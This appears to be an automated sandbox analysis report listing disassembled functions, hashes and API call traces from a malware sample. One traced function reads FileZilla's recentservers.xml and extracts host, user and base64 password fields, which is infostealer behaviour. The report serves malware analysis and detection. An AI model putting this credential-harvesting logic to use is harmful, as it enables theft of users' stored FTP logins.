                                            • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                            • Instruction Fuzzy Hash: 01B1F671A197118FD706EE3DC491219F7E1AFD6280F51C72FE899B7662EB31E8828740
                                            Function 024C134F Relevance: .3, Instructions: 274COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5185ef17974cb1e7938c1049dfbfd6043ba02edff510d25e23a45b9cf056c98f
                                            • Instruction ID: 2563fd8d37c67ca54cc0c28e0ef626253cc6e060576e1226b0e36bffb54d834e
                                            • Opcode Fuzzy Hash: 5185ef17974cb1e7938c1049dfbfd6043ba02edff510d25e23a45b9cf056c98f
                                            • Instruction Fuzzy Hash: 7191C479B002159BEF94DE6CC880B7AB3A2AF55704F2940AED91DAB387D331D841C795
                                            Function 024D8B64 Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                            • Instruction ID: 2ec9523fb7c3cd3a7ddb6e9ee7324e521fbda421bd7c51a4be902d8d694440f7
                                            • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                            • Instruction Fuzzy Hash: 47B13D71611608DFD715CF28C49AB657BE0FF45368F25865AE89ACF3A1C335E982CB40
                                            Function 024AA5FF Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                            • Instruction ID: cab72d0b4ea9ddc15501a7fd6cd09df69f75190dee26d0f2eb2159b9085a1e79
                                            • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                            • Instruction Fuzzy Hash: 65C14975A0471A8FC715DF28C08055AB3F2FF88350F258A6DE8999B721D731E996CF81
                                            Function 024BCA0F Relevance: .3, Instructions: 258COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                            • Instruction ID: 7245c5edd5537c552ad856bcf3b560c1abfe746c882565bbe1e7c655660e8e2e
                                            • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                            • Instruction Fuzzy Hash: 8F9146319287906EEB168B3CCCC17AABB59FFE6350F10C71BF988725A1FB7185818254
                                            Function 024CC805 Relevance: .2, Instructions: 242COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                            • Instruction ID: fc4a33475f1b0b34b895ac0cd334d08e56316508e158cd4aa0582d37991ec486
                                            • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                            • Instruction Fuzzy Hash: EEA10AB6A10A19CBEB59CF59CCC5AAABBB1FB48314F24C22ED41AE7390D3349544CF50
                                            Function 024936EF Relevance: .2, Instructions: 240COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                            • Instruction ID: 6766ceac44d87fb7f43635d3d30a9452665cccf64b661245910ae004d7d8a5be
                                            • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                            • Instruction Fuzzy Hash: 82A15F72A087519BD308CF25C89075BF7E2EFC8710F1ACA3EE89997254D774E9419B82
                                            Function 024C5C00 Relevance: .1, Instructions: 131COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                            • Instruction ID: 164d2a370d3b900116d442ba017f9acb05165fe30783facad4c3115d99723a29
                                            • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                            • Instruction Fuzzy Hash: 5D514B76E09BD985C7058B7944502EEBFB21FE6104F2E829EC4982F383C335568AC3E5
                                            Function 00840083 Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929328076.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_840000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction ID: 10cbc45072ac03862688e733fddf117f8cb0119047a13ae9312e56f9a9b634c2
                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction Fuzzy Hash: 66117C72340104AFD754DE59DCC1FA773EAFB89320B298065EE08CB316E676E841CB60
                                            Function 02450D90 Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                            • Instruction ID: 97c5f606633d988940d90d4e470841c09bb514e6dbc887a5061ceb0af5f7922e
                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                            • Instruction Fuzzy Hash: BF01F27AA106108FDF21CF20C904BAB33E5EB8A306F1550A6DD4A97382E370A8458F80
                                            Function 00419AA0 Relevance: .0, Instructions: 15COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                            Function 02496A0F Relevance: .0, Instructions: 15COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                            • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                            • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                            • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                            Function 02469D07 Relevance: .0, Instructions: 15COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                            Function 0246D503 Relevance: 107.7, APIs: 86, Instructions: 188COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                            • Instruction ID: 72bcb140e429b4f9671c542887886c2a059e7f9290e44a7ac513dc818d29fb66
                                            • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                            • Instruction Fuzzy Hash: 8771C1324916009AD7723B32DE19E697FA3FF07744F10C61FD2B670DB09A226C659E52
                                            Function 004103B0 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363stringmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                              • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                              • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                              • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                              • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                              • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                              • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                            • strtok_s.MSVCRT ref: 0041047B
                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 004104C2
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004104C9
                                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 004104E5
                                            • lstrlenA.KERNEL32(00000000), ref: 004104F3
                                              • Part of subcall function 00418A70: malloc.MSVCRT ref: 00418A78
                                              • Part of subcall function 00418A70: strncpy.MSVCRT ref: 00418A93
                                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 0041052F
                                            • lstrlenA.KERNEL32(00000000), ref: 0041053D
                                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00410579
                                            • lstrlenA.KERNEL32(00000000), ref: 00410587
                                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004105C3
                                            • lstrlenA.KERNEL32(00000000), ref: 004105D5
                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 00410662
                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041067A
                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410692
                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 004106AA
                                            • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 004106C2
                                            • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 004106D1
                                            • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 004106E0
                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004106F3
                                            • lstrcatA.KERNEL32(?,00421770,?,?,00000000), ref: 00410702
                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410715
                                            • lstrcatA.KERNEL32(?,00421774,?,?,00000000), ref: 00410724
                                            • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 00410733
                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410746
                                            • lstrcatA.KERNEL32(?,00421780,?,?,00000000), ref: 00410755
                                            • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410764
                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410777
                                            • lstrcatA.KERNEL32(?,00421790,?,?,00000000), ref: 00410786
                                            • lstrcatA.KERNEL32(?,00421794,?,?,00000000), ref: 00410795
                                            • strtok_s.MSVCRT ref: 004107D9
                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004107EE
                                            • memset.MSVCRT ref: 0041083D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                            • API String ID: 337689325-555421843
                                            • Opcode ID: 4fc848dbf87095acd12c42b60f0aab464385706ec0422a8f446ef3a48111bdb9
                                            • Instruction ID: 8daa67574ba642934e37c5269d194fb48a2cec37eebf9d0dac7d381e96a5dd97
                                            • Opcode Fuzzy Hash: 4fc848dbf87095acd12c42b60f0aab464385706ec0422a8f446ef3a48111bdb9
                                            • Instruction Fuzzy Hash: 65D17271E01108ABCB04EBF0ED56EEE7339AF54315F50855AF102B7095EF38AA94CB69
                                            Function 02454877 Relevance: 51.1, APIs: 34, Instructions: 114stringmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(00424EC8), ref: 02454883
                                            • lstrlen.KERNEL32(00424F78), ref: 0245488E
                                            • lstrlen.KERNEL32(00425040), ref: 02454899
                                            • lstrlen.KERNEL32(004250F8), ref: 024548A4
                                            • lstrlen.KERNEL32(004251A0), ref: 024548AF
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 024548BE
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 024548C5
                                            • lstrlen.KERNEL32(00425248), ref: 024548D3
                                            • lstrlen.KERNEL32(004252F0), ref: 024548DE
                                            • lstrlen.KERNEL32(00425398), ref: 024548E9
                                            • lstrlen.KERNEL32(00425440), ref: 024548F4
                                            • lstrlen.KERNEL32(004254E8), ref: 024548FF
                                            • lstrlen.KERNEL32(00425590), ref: 02454913
                                            • lstrlen.KERNEL32(00425638), ref: 0245491E
                                            • lstrlen.KERNEL32(004256E0), ref: 02454929
                                            • lstrlen.KERNEL32(00425788), ref: 02454934
                                            • lstrlen.KERNEL32(00425830), ref: 0245493F
                                            • lstrlen.KERNEL32(004258D8), ref: 02454968
                                            • lstrlen.KERNEL32(00425980), ref: 02454973
                                            • lstrlen.KERNEL32(00425A48), ref: 0245497E
                                            • lstrlen.KERNEL32(00425AF0), ref: 02454989
                                            • lstrlen.KERNEL32(00425B98), ref: 02454994
                                            • strlen.MSVCRT ref: 024549A7
                                            • lstrlen.KERNEL32(00425C40), ref: 024549CF
                                            • lstrlen.KERNEL32(00425CE8), ref: 024549DA
                                            • lstrlen.KERNEL32(00425D90), ref: 024549E5
                                            • lstrlen.KERNEL32(00425E38), ref: 024549F0
                                            • lstrlen.KERNEL32(00425EE0), ref: 024549FB
                                            • lstrlen.KERNEL32(00425F88), ref: 02454A0B
                                            • lstrlen.KERNEL32(00426030), ref: 02454A16
                                            • lstrlen.KERNEL32(004260D8), ref: 02454A21
                                            • lstrlen.KERNEL32(00426180), ref: 02454A2C
                                            • lstrlen.KERNEL32(00426228), ref: 02454A37
                                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 02454A53
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                            • String ID:
                                            • API String ID: 2127927946-0
                                            • Opcode ID: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                            • Instruction ID: 3941cfc74ddaa80ea60a23cbe0ed731c6c85183ead6f68745c82be55e95be943
                                            • Opcode Fuzzy Hash: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                            • Instruction Fuzzy Hash: 99412D79740624ABD7109FE5FC4EADCBF60AB4C712B908051F90A89190C7F59385DB7D
                                            Function 02469E17 Relevance: 49.7, APIs: 33, Instructions: 212libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcAddress.KERNEL32(006D72B8,006D6C04), ref: 02469E58
                                            • GetProcAddress.KERNEL32(006D72B8,006D6FC8), ref: 02469E71
                                            • GetProcAddress.KERNEL32(006D72B8,006D7044), ref: 02469E89
                                            • GetProcAddress.KERNEL32(006D72B8,006D6C64), ref: 02469EA1
                                            • GetProcAddress.KERNEL32(006D72B8,006D6C50), ref: 02469EBA
                                            • GetProcAddress.KERNEL32(006D72B8,006D6CF8), ref: 02469ED2
                                            • GetProcAddress.KERNEL32(006D72B8,006D6ED4), ref: 02469EEA
                                            • GetProcAddress.KERNEL32(006D72B8,006D6D3C), ref: 02469F03
                                            • GetProcAddress.KERNEL32(006D72B8,006D6FA0), ref: 02469F1B
                                            • GetProcAddress.KERNEL32(006D72B8,006D6F48), ref: 02469F33
                                            • GetProcAddress.KERNEL32(006D72B8,006D6DBC), ref: 02469F4C
                                            • GetProcAddress.KERNEL32(006D72B8,006D6CE8), ref: 02469F64
                                            • GetProcAddress.KERNEL32(006D72B8,006D700C), ref: 02469F7C
                                            • GetProcAddress.KERNEL32(006D72B8,006D6AB0), ref: 02469F95
                                            • GetProcAddress.KERNEL32(006D72B8,006D6F98), ref: 02469FAD
                                            • GetProcAddress.KERNEL32(006D72B8,006D6C24), ref: 02469FC5
                                            • GetProcAddress.KERNEL32(006D72B8,006D6E18), ref: 02469FDE
                                            • GetProcAddress.KERNEL32(006D72B8,006D7034), ref: 02469FF6
                                            • GetProcAddress.KERNEL32(006D72B8,006D6ABC), ref: 0246A00E
                                            • GetProcAddress.KERNEL32(006D72B8,006D6B2C), ref: 0246A027
                                            • GetProcAddress.KERNEL32(006D72B8,006D6CB0), ref: 0246A03F
                                            • LoadLibraryA.KERNEL32(006D6F50,?,02466F07), ref: 0246A051
                                            • LoadLibraryA.KERNEL32(006D6B7C,?,02466F07), ref: 0246A062
                                            • LoadLibraryA.KERNEL32(006D6B04,?,02466F07), ref: 0246A074
                                            • LoadLibraryA.KERNEL32(006D6BDC,?,02466F07), ref: 0246A086
                                            • LoadLibraryA.KERNEL32(006D6D28,?,02466F07), ref: 0246A097
                                            • GetProcAddress.KERNEL32(006D70DC,006D6EAC), ref: 0246A0B9
                                            • GetProcAddress.KERNEL32(006D71FC,006D6E24), ref: 0246A0DA
                                            • GetProcAddress.KERNEL32(006D71FC,006D6BCC), ref: 0246A0F2
                                            • GetProcAddress.KERNEL32(006D72EC,006D6D94), ref: 0246A114
                                            • GetProcAddress.KERNEL32(006D71B0,006D6B28), ref: 0246A135
                                            • GetProcAddress.KERNEL32(006D71E0,006D6E14), ref: 0246A156
                                            • GetProcAddress.KERNEL32(006D71E0,0042072C), ref: 0246A16D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad
                                            • String ID:
                                            • API String ID: 2238633743-0
                                            • Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                            • Instruction ID: 7d2e7bc78a1e8dc5b4cd2013251f105c8d19fc3f62d4a142a136724eeab56454
                                            • Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                            • Instruction Fuzzy Hash: 94A15EB5D0A254AFC344DFA8FC889567BBBA74D301718A61BF909C3674E734A640CF62
                                            Function 02460617 Relevance: 48.4, APIs: 32, Instructions: 363stringmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 024691D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02469202
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AD17: lstrcpy.KERNEL32(?,00000000), ref: 0246AD5D
                                              • Part of subcall function 0245A377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0245A3A3
                                              • Part of subcall function 0245A377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0245A3C8
                                              • Part of subcall function 0245A377: LocalAlloc.KERNEL32(00000040,?), ref: 0245A3E8
                                              • Part of subcall function 0245A377: ReadFile.KERNEL32(000000FF,?,00000000,024516F6,00000000), ref: 0245A411
                                              • Part of subcall function 0245A377: LocalFree.KERNEL32(024516F6), ref: 0245A447
                                              • Part of subcall function 0245A377: CloseHandle.KERNEL32(000000FF), ref: 0245A451
                                              • Part of subcall function 02469227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02469249
                                            • strtok_s.MSVCRT ref: 024606E2
                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 02460729
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02460730
                                            • StrStrA.SHLWAPI(00000000,00421710), ref: 0246074C
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 0246075A
                                              • Part of subcall function 02468CD7: malloc.MSVCRT ref: 02468CDF
                                              • Part of subcall function 02468CD7: strncpy.MSVCRT ref: 02468CFA
                                            • StrStrA.SHLWAPI(00000000,00421718), ref: 02460796
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 024607A4
                                            • StrStrA.SHLWAPI(00000000,00421720), ref: 024607E0
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 024607EE
                                            • StrStrA.SHLWAPI(00000000,00421728), ref: 0246082A
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 0246083C
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 024608C9
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 024608E1
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 024608F9
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 02460911
                                            • lstrcat.KERNEL32(?,00421744), ref: 02460929
                                            • lstrcat.KERNEL32(?,00421758), ref: 02460938
                                            • lstrcat.KERNEL32(?,00421768), ref: 02460947
                                            • lstrcat.KERNEL32(?,00000000), ref: 0246095A
                                            • lstrcat.KERNEL32(?,00421770), ref: 02460969
                                            • lstrcat.KERNEL32(?,00000000), ref: 0246097C
